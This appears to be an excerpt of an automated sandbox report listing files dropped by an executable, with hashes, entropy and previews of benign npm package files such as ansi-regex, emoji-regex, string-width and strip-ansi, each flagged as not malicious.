              SHA-256:B75D22297E1BD8992F86218F1749435D05921D2D765697E46A43F680B2EDC859
              SHA-512:68FD2E514483534A63C30EE5F7AC79917478DE663324A47FF5C9E47532ACE13D1B584B940748AF9183D96440F8AD702324A0155F2331784D914C77942B370112
              Malicious:false
              Reputation:unknown
              Preview:// Bootstrap cliui with ESM dependencies:.import { cliui } from './build/lib/index.js'..import stringWidth from 'string-width'.import stripAnsi from 'strip-ansi'.import wrap from 'wrap-ansi'..export default function ui (opts) {. return cliui(opts, {. stringWidth,. stripAnsi,. wrap. }).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):350
              Entropy (8bit):5.538325101917328
              Encrypted:false
              SSDEEP:
              MD5:4B05188FFF08C3F12812C29561915D54
              SHA1:BD2DEC3594C15A8ED8CC9D45EE8C2A6FDEDCFB37
              SHA-256:110C5FE554ECCDDA9B95BE9A33EDD4D4E867C8432460A8F39C9B7FF841B00772
              SHA-512:894B656903A1875C37C5D7CD9AA14FA7613961FFDBEBC3CEDA6D9BA766D46FAF9369A811827389F6DCC101E65A7C935FB83E40AA707453FB203A675752370670
              Malicious:false
              Reputation:unknown
              Preview:export default function ansiRegex({onlyFirst = false} = {}) {..const pattern = [.. '[\\u001B\\u009B][[\\]()#;?]*(?:(?:(?:(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]+)*|[a-zA-Z\\d]+(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*)?\\u0007)',...'(?:(?:\\d{1,4}(?:;\\d{0,4})*)?[\\dA-PR-TZcf-ntqry=><~]))'..].join('|');...return new RegExp(pattern, onlyFirst ? undefined : 'g');.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (460)
              Category:dropped
              Size (bytes):1117
              Entropy (8bit):5.079903213409815
              Encrypted:false
              SSDEEP:
              MD5:D5F2A6DD0192DCC7C833E50BB9017337
              SHA1:80674912E3033BE358331910BA27D5812369C2FC
              SHA-256:5C932D88256B4AB958F64A856FA48E8BD1F55BC1D96B8149C65689E0C61789D3
              SHA-512:D1F336FF272BC6B96DC9A04A7D0EF8F02936DD594F514060340478EE575FE01D55FC7A174DF5814A4FAF72C8462B012998ECA7BB898E3F9A3E87205FB9135AF2
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (https://sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):958
              Entropy (8bit):4.795002151075833
              Encrypted:false
              SSDEEP:
              MD5:D2894A8EBBC4840E85527B8C051DAC86
              SHA1:DABD0C9882FB3B8C12222595FB92AD26B60671A1
              SHA-256:8A331BEBFC9225B6AFE7A15542843A78BA7943454B6261CFE60B734513E1D32C
              SHA-512:7266A2F0BBBC398C5E4A4F2D66670A205D1CD35F0D11A89840B56F221057776BDB54723D7D767DDBD1861379C01AC660FBBEB36DBB5374E53756AE9AFBC63E8C
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "ansi-regex",.."version": "6.0.1",.."description": "Regular expression for matching ANSI escape codes",.."license": "MIT",.."repository": "chalk/ansi-regex",.."funding": "https://github.com/chalk/ansi-regex?sponsor=1",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "https://sindresorhus.com"..},.."type": "module",.."exports": "./index.js",.."engines": {..."node": ">=12"..},.."scripts": {..."test": "xo && ava && tsd",..."view-supported": "node fixtures/view-codes.js"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."ansi",..."styles",..."color",..."colour",..."colors",..."terminal",..."console",..."cli",..."string",..."tty",..."escape",..."formatting",..."rgb",..."256",..."shell",..."xterm",..."command-line",..."text",..."regex",..."regexp",..."re",..."match",..."test",..."find",..."pattern"..],.."devDependencies": {..."ava": "^3.15.0",..."tsd": "^0.14.0",..."xo": "^0.38.2"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (12899)
              Category:dropped
              Size (bytes):12976
              Entropy (8bit):3.9880853116245176
              Encrypted:false
              SSDEEP:
              MD5:ECFE555612280520671011F810C4705F
              SHA1:279C292E4C45265FA06A8957FDD6E1643FDBFD3E
              SHA-256:D02478271A0E0BA3A1753FFB2217ABA4FF6852ECC6833EEA880946B15103A8F9
              SHA-512:FFC5D3058D94B9ED1A6B259F8A095363BAA1C1C9809890552CB44D2887F8DE1448404BBD1D515C3713173CACC9ADBE2A47039F94FB908BD9A029AB805D011A59
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..module.exports = function () {. // https://mths.be/emoji. return /\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62(?:\uDB40\uDC77\uDB40\uDC6C\uDB40\uDC73|\uDB40\uDC73\uDB40\uDC63\uDB40\uDC74|\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67)\uDB40\uDC7F|(?:\uD83E\uDDD1\uD83C\uDFFF\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFF\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB-\uDFFE])|(?:\uD83E\uDDD1\uD83C\uDFFE\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFE\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB-\uDFFD\uDFFF])|(?:\uD83E\uDDD1\uD83C\uDFFD\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFD\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB\uDFFC\uDFFE\uDFFF])|(?:\uD83E\uDDD1\uD83C\uDFFC\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFC\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB\uD
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (13953)
              Category:dropped
              Size (bytes):14024
              Entropy (8bit):4.16449596350378
              Encrypted:false
              SSDEEP:
              MD5:C356C4D646D1460F1D61617DBF60522E
              SHA1:780B5F3A12284F0DCC50DDFBAC2611C79535C719
              SHA-256:6EF32D4593F0F75CC80D87D49EBA6C635A6AC9B5E0F8202520A6027277A7134E
              SHA-512:7B718C09EC52375BDC321865A5230F52F038CBEFFF170A71D85670876E8BBA34A4F36ABDEA8A7C07AC1C446C2F4FB681ACC0E340F903C8DC2F084104ADEE7CDE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..module.exports = () => {. // https://mths.be/emoji. return /\u{1F3F4}\u{E0067}\u{E0062}(?:\u{E0077}\u{E006C}\u{E0073}|\u{E0073}\u{E0063}\u{E0074}|\u{E0065}\u{E006E}\u{E0067})\u{E007F}|(?:\u{1F9D1}\u{1F3FF}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FF}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}-\u{1F3FE}]|(?:\u{1F9D1}\u{1F3FE}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FE}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}-\u{1F3FD}\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FD}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FD}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}\u{1F3FC}\u{1F3FE}\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FC}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FC}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}\u{1F3FD}-\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FB}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FB}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (17334)
              Category:dropped
              Size (bytes):17405
              Entropy (8bit):4.165691132561316
              Encrypted:false
              SSDEEP:
              MD5:C934D55B9F92A8D3BEA1F6A87FA56533
              SHA1:FA44CE6A357BBF705C09E42D5CDB194F59C1E79A
              SHA-256:8899E020A16B1D0647C6BBD84E17592F1DEF5E65F4818FD7C21C0F10008B04DD
              SHA-512:90E3AEC17C5D211E1C5DBE6ADFE44CC2FA2306CBA93C247901C00D94125037DD6473615A11C720668CACA4167B7EF5DE278D3C2879BE8F357B9EE5D6E783F2B3
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..module.exports = () => {. // https://mths.be/emoji. return /\u{1F3F4}\u{E0067}\u{E0062}(?:\u{E0077}\u{E006C}\u{E0073}|\u{E0073}\u{E0063}\u{E0074}|\u{E0065}\u{E006E}\u{E0067})\u{E007F}|(?:\u{1F9D1}\u{1F3FF}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FF}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}-\u{1F3FE}]|(?:\u{1F9D1}\u{1F3FE}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FE}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}-\u{1F3FD}\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FD}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FD}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}\u{1F3FC}\u{1F3FE}\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FC}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FC}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}\u{1F3FD}-\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FB}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FB}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (15725)
              Category:dropped
              Size (bytes):15796
              Entropy (8bit):4.171801301803633
              Encrypted:false
              SSDEEP:
              MD5:12148D2DFF9CA3478E4467945663FA70
              SHA1:50998482C521255AF2760ED95BBDB1C4F7387212
              SHA-256:1FB82C82D847EBC4AA287F481FF67C8CC9BDE03149987B2D43EB0DEE2A5160B6
              SHA-512:F9F6A61AF37D1924E3A9785AA04A33FA0107791D54CB07663C6EA8A68EDFAE3766682E914B6AFAF198EB97C7F73AB53AA500B4661CDABDEBD2576526664166F4
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..module.exports = () => {. // https://mths.be/emoji. return /\u{1F3F4}\u{E0067}\u{E0062}(?:\u{E0077}\u{E006C}\u{E0073}|\u{E0073}\u{E0063}\u{E0074}|\u{E0065}\u{E006E}\u{E0067})\u{E007F}|(?:\u{1F9D1}\u{1F3FF}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FF}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}-\u{1F3FE}]|(?:\u{1F9D1}\u{1F3FE}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FE}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}-\u{1F3FD}\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FD}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FD}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}\u{1F3FC}\u{1F3FE}\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FC}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FC}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[\u{1F3FB}\u{1F3FD}-\u{1F3FF}]|(?:\u{1F9D1}\u{1F3FB}\u200D\u2764\uFE0F\u200D(?:\u{1F48B}\u200D)?\u{1F9D1}|\u{1F469}\u{1F3FB}\u200D\u{1F91D}\u200D[\u{1F468}\u{1F469}])[
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (15658)
              Category:dropped
              Size (bytes):15735
              Entropy (8bit):4.002067802016125
              Encrypted:false
              SSDEEP:
              MD5:D59A0C2EBD6EEA2ECDE91D5D8DB69597
              SHA1:415B8552CC069B0B51EC9A0D11E674D0D7BCE944
              SHA-256:0766305FAF3D167FFD85AD6B6D52C80BFEBB90187D83EA6F96ED84B583777E95
              SHA-512:5F33674CBB42282D829E9CE33AD638996166FBD84295886EC9868242C3B3C18A685CF22CAD32563C607182EAD141B872F3A9D69B8608B2CF700336E1D48EADE5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..module.exports = function () {. // https://mths.be/emoji. return /\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62(?:\uDB40\uDC77\uDB40\uDC6C\uDB40\uDC73|\uDB40\uDC73\uDB40\uDC63\uDB40\uDC74|\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67)\uDB40\uDC7F|(?:\uD83E\uDDD1\uD83C\uDFFF\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFF\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB-\uDFFE])|(?:\uD83E\uDDD1\uD83C\uDFFE\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFE\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB-\uDFFD\uDFFF])|(?:\uD83E\uDDD1\uD83C\uDFFD\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFD\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB\uDFFC\uDFFE\uDFFF])|(?:\uD83E\uDDD1\uD83C\uDFFC\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFC\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB\uD
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1331
              Entropy (8bit):4.857217025358989
              Encrypted:false
              SSDEEP:
              MD5:4A14D4B54700538E3369C29F7E6F2379
              SHA1:238C48183550D02AB5C0DD37E13D57006DCE640A
              SHA-256:181FA046BDBB7D8958C57DCEF2E63AEA9AF667036E218C7222479A8618375F1A
              SHA-512:D8234B8D250CA8F5A7FC6CA2D37A410824E1F9FD13DECBBE488CD59BF138ADE96F91EB712825539F84245FB6F1A2F784159C8A9D19CA880DC2710661E3282F30
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "emoji-regex",. "version": "9.2.2",. "description": "A regular expression to match all Emoji-only symbols as per the Unicode Standard.",. "homepage": "https://mths.be/emoji-regex",. "main": "index.js",. "types": "index.d.ts",. "keywords": [. "unicode",. "regex",. "regexp",. "regular expressions",. "code points",. "symbols",. "characters",. "emoji". ],. "license": "MIT",. "author": {. "name": "Mathias Bynens",. "url": "https://mathiasbynens.be/". },. "repository": {. "type": "git",. "url": "https://github.com/mathiasbynens/emoji-regex.git". },. "bugs": "https://github.com/mathiasbynens/emoji-regex/issues",. "files": [. "LICENSE-MIT.txt",. "index.js",. "index.d.ts",. "RGI_Emoji.js",. "RGI_Emoji.d.ts",. "text.js",. "text.d.ts",. "es2015". ],. "scripts": {. "build": "rm -rf -- es2015; babel src -d .; NODE_ENV=es2015 babel src es2015_types -D -d ./es2015; node script/inject-sequences.js",. "test":
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (14391)
              Category:dropped
              Size (bytes):14468
              Entropy (8bit):4.0042755628696085
              Encrypted:false
              SSDEEP:
              MD5:7B33DD38C0C08BF185F5480EFDF9AB90
              SHA1:B3D9D61AD3AB1F87712280265DF367EFF502EF8B
              SHA-256:D1E41C11AA11E125105D14C95D05E1E1ACD3BEDE89429D3A1C12A71450318F88
              SHA-512:22DA641C396F9972B136D4A18EB0747747252CF7D5D89F619A928C5475D79375FBBE42D4E91821102E271EA144F89267FF307CD46494FDF7D6002CE9768B7BD9
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..module.exports = function () {. // https://mths.be/emoji. return /\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62(?:\uDB40\uDC77\uDB40\uDC6C\uDB40\uDC73|\uDB40\uDC73\uDB40\uDC63\uDB40\uDC74|\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67)\uDB40\uDC7F|(?:\uD83E\uDDD1\uD83C\uDFFF\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFF\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB-\uDFFE])|(?:\uD83E\uDDD1\uD83C\uDFFE\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFE\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB-\uDFFD\uDFFF])|(?:\uD83E\uDDD1\uD83C\uDFFD\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFD\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB\uDFFC\uDFFE\uDFFF])|(?:\uD83E\uDDD1\uD83C\uDFFC\u200D\u2764\uFE0F\u200D(?:\uD83D\uDC8B\u200D)?\uD83E\uDDD1|\uD83D\uDC69\uD83C\uDFFC\u200D\uD83E\uDD1D\u200D(?:\uD83D[\uDC68\uDC69]))(?:\uD83C[\uDFFB\uD
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):1064
              Entropy (8bit):4.9891161999511775
              Encrypted:false
              SSDEEP:
              MD5:E425955CCD341CF2B2B4B95366B687E7
              SHA1:84E24B625A49263B8192B39507002656E64F8302
              SHA-256:4508758772B1F52850B576CA714BBFD6EDB05F8D36492CEAB573DB47F5CD7D84
              SHA-512:258878009E1BBCA7E3F91A2CED8C531DD46BAB19DC26A39E0C8C00CEA92FEDA5663E2D652F3A21EED87593D2F887F16FBB7A6AAC0BF3E91A2843E102F5923059
              Malicious:false
              Reputation:unknown
              Preview:import stripAnsi from 'strip-ansi';.import eastAsianWidth from 'eastasianwidth';.import emojiRegex from 'emoji-regex';..export default function stringWidth(string, options = {}) {..if (typeof string !== 'string' || string.length === 0) {...return 0;..}...options = {...ambiguousIsNarrow: true,......options..};...string = stripAnsi(string);...if (string.length === 0) {...return 0;..}...string = string.replace(emojiRegex(), ' ');...const ambiguousCharacterWidth = options.ambiguousIsNarrow ? 1 : 2;..let width = 0;...for (const character of string) {...const codePoint = character.codePointAt(0);....// Ignore control characters...if (codePoint <= 0x1F || (codePoint >= 0x7F && codePoint <= 0x9F)) {....continue;...}....// Ignore combining characters...if (codePoint >= 0x300 && codePoint <= 0x36F) {....continue;...}....const code = eastAsianWidth.eastAsianWidth(character);...switch (code) {....case 'F':....case 'W':.....width += 2;.....break;....case 'A':.....width += ambiguousCharacterWidth;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1044
              Entropy (8bit):4.8232740236528695
              Encrypted:false
              SSDEEP:
              MD5:6370FD65C542B20D05BEB70FD94E5AEB
              SHA1:53AE7A1B3953E86624927FEC8421D453D9C88E41
              SHA-256:ADBCB3B95EA29C1F2A91A0AF600FD9136CE408A38622332848BA4630DC473659
              SHA-512:37BE93A008F964CFDD4C92401E8A9B815CE51B6B5C8C711E0FBCABC119235D1F352A26C9D03C4203EF82E696C28606762474DFD5EFC960E6B6DF1AFD47465729
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "string-width",.."version": "5.1.2",.."description": "Get the visual width of a string - the number of columns required to display it",.."license": "MIT",.."repository": "sindresorhus/string-width",.."funding": "https://github.com/sponsors/sindresorhus",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "https://sindresorhus.com"..},.."type": "module",.."exports": "./index.js",.."engines": {..."node": ">=12"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."string",..."character",..."unicode",..."width",..."visual",..."column",..."columns",..."fullwidth",..."full-width",..."full",..."ansi",..."escape",..."codes",..."cli",..."command-line",..."terminal",..."console",..."cjk",..."chinese",..."japanese",..."korean",..."fixed-width"..],.."dependencies": {..."eastasianwidth": "^0.2.0",..."emoji-regex": "^9.2.2",..."strip-ansi": "^7.0.1"..},.."devDependencies": {..."ava": "^3.15.0",
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):468
              Entropy (8bit):4.839560087472558
              Encrypted:false
              SSDEEP:
              MD5:A6FC9AB578293C89852087B7B0D78552
              SHA1:B443533358BE43AE037F23CD250E3352AE1D6029
              SHA-256:C5BB23B3CA69E97DDEFDB76724B1A7936AC18B5E47C3FE3C5391969D6E6D06F8
              SHA-512:D6795F2DDB1CE4DD0BEEC89CEDB564E412183192CBA97B4CA2BAA7BA443638247CDCD87182E4680647D4F30B90C41C361A542B07D3C77EEEC307C4689D76B052
              Malicious:false
              Reputation:unknown
              Preview:import ansiRegex from 'ansi-regex';..const regex = ansiRegex();..export default function stripAnsi(string) {..if (typeof string !== 'string') {...throw new TypeError(`Expected a \`string\`, got \`${typeof string}\``);..}...// Even though the regex is global, we don't need to reset the `.lastIndex`..// because unlike `.exec()` and `.test()`, `.replace()` does it automatically..// and doing it manually has a performance penalty...return string.replace(regex, '');.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):914
              Entropy (8bit):4.788208456080851
              Encrypted:false
              SSDEEP:
              MD5:A1A0019976C3F4994C816DF2EB411962
              SHA1:323EC71C0CDB2DFDCF717F3E324F0B77981D7C58
              SHA-256:01CEE5E384D1E26843021C1F91BC05ED009E14C2D31C01349A374E64D3416E7D
              SHA-512:59CBF6D8B3E7EFACE2B660FAE651AFBE054A1AA0348F817559FB12CE22CA1648CC9A021196E8F6A6D37AE3D2EB0772D2D40B1E531DB3F3DEB6776A189D167F69
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "strip-ansi",.."version": "7.1.0",.."description": "Strip ANSI escape codes from a string",.."license": "MIT",.."repository": "chalk/strip-ansi",.."funding": "https://github.com/chalk/strip-ansi?sponsor=1",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "https://sindresorhus.com"..},.."type": "module",.."exports": "./index.js",.."engines": {..."node": ">=12"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."strip",..."trim",..."remove",..."ansi",..."styles",..."color",..."colour",..."colors",..."terminal",..."console",..."string",..."tty",..."escape",..."formatting",..."rgb",..."256",..."shell",..."xterm",..."log",..."logging",..."command-line",..."text"..],.."dependencies": {..."ansi-regex": "^6.0.1"..},.."devDependencies": {..."ava": "^3.15.0",..."tsd": "^0.17.0",..."xo": "^0.44.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2164
              Entropy (8bit):4.761396177786696
              Encrypted:false
              SSDEEP:
              MD5:A5CD1A3E1D5276BC314C376FE1084394
              SHA1:5F8F4C1E3BF1144F3A52C51BF040D843BB2A8B90
              SHA-256:B4F9CC8D09602A487DEA1C227CE24777CDA87E2AD8A29AB9F741214AB78DC065
              SHA-512:50CE6EC1E6EBBCB7B8057FFB114E2ADA81D342118AE37A6F016FE64D8E34662716256C3BF75D71EBAC82FD9D8D6055499539F22E6BDD03C73A39E752965A882A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@isaacs/cliui",. "version": "8.0.2",. "description": "easily create complex multi-column command-line-interfaces",. "main": "build/index.cjs",. "exports": {. ".": [. {. "import": "./index.mjs",. "require": "./build/index.cjs". },. "./build/index.cjs". ]. },. "type": "module",. "module": "./index.mjs",. "scripts": {. "check": "standardx '**/*.ts' && standardx '**/*.js' && standardx '**/*.cjs'",. "fix": "standardx --fix '**/*.ts' && standardx --fix '**/*.js' && standardx --fix '**/*.cjs'",. "pretest": "rimraf build && tsc -p tsconfig.test.json && cross-env NODE_ENV=test npm run build:cjs",. "test": "c8 mocha ./test/*.cjs",. "test:esm": "c8 mocha ./test/**/*.mjs",. "postest": "check",. "coverage": "c8 report --check-coverage",. "precompile": "rimraf build",. "compile": "tsc",. "postcompile": "npm run build:cjs",. "build:cjs": "rollup -c",. "prepare": "npm run compile". },. "repository": "yargs/cl
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):4.720989963431298
              Encrypted:false
              SSDEEP:
              MD5:3977396BEE816D3A9EDD26083A7B2297
              SHA1:4B294FD8FCEBC309FD7139B3F33344F376BBB08B
              SHA-256:CD6025C8F45932DA9C61FAC350542414CFBF2BAD9F01F9CA78AA84F038E4A390
              SHA-512:C2623995C36BD865D6F44BA00A29AF6160DC69F8B175E9E20B9530DB355ACF51A4610312293D09F2ABC4FB835773A6D6C847EA14A3E8DDF843272D938CE614CA
              Malicious:false
              Reputation:unknown
              Preview:const hasIntl = typeof Intl === 'object' && !!Intl.const Collator = hasIntl && Intl.Collator.const cache = new Map()..const collatorCompare = (locale, opts) => {. const collator = new Collator(locale, opts). return (a, b) => collator.compare(a, b).}..const localeCompare = (locale, opts) => (a, b) => a.localeCompare(b, locale, opts)..const knownOptions = [. 'sensitivity',. 'numeric',. 'ignorePunctuation',. 'caseFirst',.]..const { hasOwnProperty } = Object.prototype..module.exports = (locale, options = {}) => {. if (!locale || typeof locale !== 'string'). throw new TypeError('locale required').. const opts = knownOptions.reduce((opts, k) => {. if (hasOwnProperty.call(options, k)) {. opts[k] = options[k]. }. return opts. }, {}). const key = `${locale}\n${JSON.stringify(opts)}`.. if (cache.has(key)). return cache.get(key).. const compare = hasIntl. ? collatorCompare(locale, opts). : localeCompare(locale, opts). cache.set(key, compare).. return compar
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):696
              Entropy (8bit):4.696683408936836
              Encrypted:false
              SSDEEP:
              MD5:F2090537182B2E5883272A44DE007C61
              SHA1:9DC38644EA6F125E3B06825FF04DF5EA22F56094
              SHA-256:45B3F486E72A9D0E0279CDA0003713DDE115B7D0D75C4ACFA7129CFFB97E4AB3
              SHA-512:79A58934F5AF286E971032D962A8EAF57266BE04A22F194456B446160EF3CFA20D2B0AD5F21B0D83E061434E02528AC3F66C164DE703F3A11EDD05FE287A71EC
              Malicious:false
              Reputation:unknown
